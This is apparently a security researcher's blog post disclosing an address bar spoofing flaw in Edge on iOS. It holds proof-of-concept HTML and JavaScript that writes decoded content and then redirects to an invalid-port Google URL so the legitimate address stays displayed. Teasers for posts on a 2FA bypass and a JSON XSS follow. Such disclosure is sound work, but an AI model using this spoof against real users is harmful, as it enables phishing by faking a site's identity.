Edge IOS Address Bar Spoof

-
Hello readers,

This post is about edge IOS address bar spoof vulnerability.

Address bar spoof vulnerability is an ability to keep legit URL in address bar
while loading the content from other domain. This makes user believe that the
content is actually served by a legit domain. For example browser is displaying
https://www.google.com in address bar or in omni-box while rendering the content
from https://www.evil.com

Original POC code:

test.html


<button onclick="window.open('http://lab-nick.codeanyapp.com/test.html')">
  Goto-Google
</button>

test2.html

<html> <body> <script> window.onload = function() { var payload = "PGh0bWw+Cjxib2R5Pgo8aDE+QWRkcmVzcyBCYXIgU3B
vb2YgQEMwZDNHMzNrPC9oMT4KPC9ib2R5Pgo8L2h0bWw+"; document.write(atob(payload)); window.location = 'https://www.google.com:8888'; } </script> </body> </html>

The idea here is to write into document and then changing the location to invalid port URL.
Which engage the browser to keep displaying https://www.google.com:8888.
It results in displaying https://www.google.com:8888 while loading the content from
http://lab-nick.codeanyapp.com/ we can achieve 20+ seconds spoof using this bug.


Video POC:





According to Microsoft this issue is not severe enough to fix immediately
and hence will be fixed in upcoming releases.

Thanks for reading :)


Comments

Post a Comment

Popular posts from this blog

How I bypassed 2-Factor Authentication in a bug bounty program

-
Image
Hello readers, This post is about one of my recent finding in a private bug bounty program on hackerone. For the sake of privacy, let’s call the site as bountyplease.com According to Bountyplease.com scope, they are more interested in Authentication related issues. So I decided to test their 2-Factor Authentication mechanism. As normal 2-Factor Authentication flow the process works in the following steps. 1. User login to account by providing valid email and password 2. A valid OTP send to users register number 3. User fill OTP 4. Login successful But in case if any user lose their phone or SIM card the process works in the following steps. 1. User login to account by providing valid email and password 2. User select other options 3. User provide backup codes 4. Login successful In both above described cases there is also a code flow as following. 1. User login to account by providing valid email and password 2. At this stage bountyplease.com display a pa
Read more

Story of a JSON XSS

-
Image
Hi folks, This post is about of one of my recent my finding in a bug bounty program. I started checking the application for common vulnerabilities but got nothing after spending an hour I came across an endpoint which looks as follows. If you look at request and response you will see the value of status parameter is reflecting back in the response. So I tried replacing the value of status parameter and same reflected back in the response as shown in below. What next? Let’s check for XSS with a simple payload as shown in below. But angle brackets getting filtered, after I tried some encodings but nothing worked. So I was about to give up but suddenly i decided to try array tricks. So you can see whatever we write inside the round brackets is reflecting back in response as it becomes associated array as follows Status    Equals JSON object <haha> Equals Key of JSON object T
Read more